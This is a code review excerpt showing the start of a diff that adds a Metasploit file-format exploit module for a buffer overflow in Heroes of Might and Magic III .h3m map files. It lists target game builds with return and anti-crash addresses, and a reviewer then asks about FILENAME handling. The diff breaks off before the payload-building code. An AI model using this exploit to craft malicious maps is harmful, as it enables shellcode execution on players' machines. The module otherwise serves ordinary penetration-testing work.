modules/exploits/windows/fileformat/homm3_h3m.rb

```diff
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'enumerator'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
+      'Description'    => %q{
+          This module embeds an exploit into an ucompressed map file (.h3m) for
+        Heroes of Might and Magic III. Once the map is started in-game, a
+        buffer overflow occuring when loading object sprite names leads to
+        shellcode execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pierre Lindblad', # Vulnerability discovery
+          'John AAkerblom'   # Vulnerability discovery, PoC and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '37716' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [
+            'H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
+            {
+              'Anticrash1' => 0x004497D4,
+              'Anticrash2' => 0x006A6430,
+              'Ret' => 0x004EFF87, # CALL [ESP] Heroes3.exe
+            }
+          ],
+          [
+            'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
+            {
+              'Anticrash1' => 0x00456A48,
+              'Anticrash2' => 0x006A6830,
+              'Ret' => 0x00580C0F, # CALL [ESP] Heroes3 HD.exe
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jul 29 2015',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME',
```

Comment:
This module allows the use of both existing and non-existing filenames. In the case of a non-existing filename (normal use case where new file is created), would that not cause an error?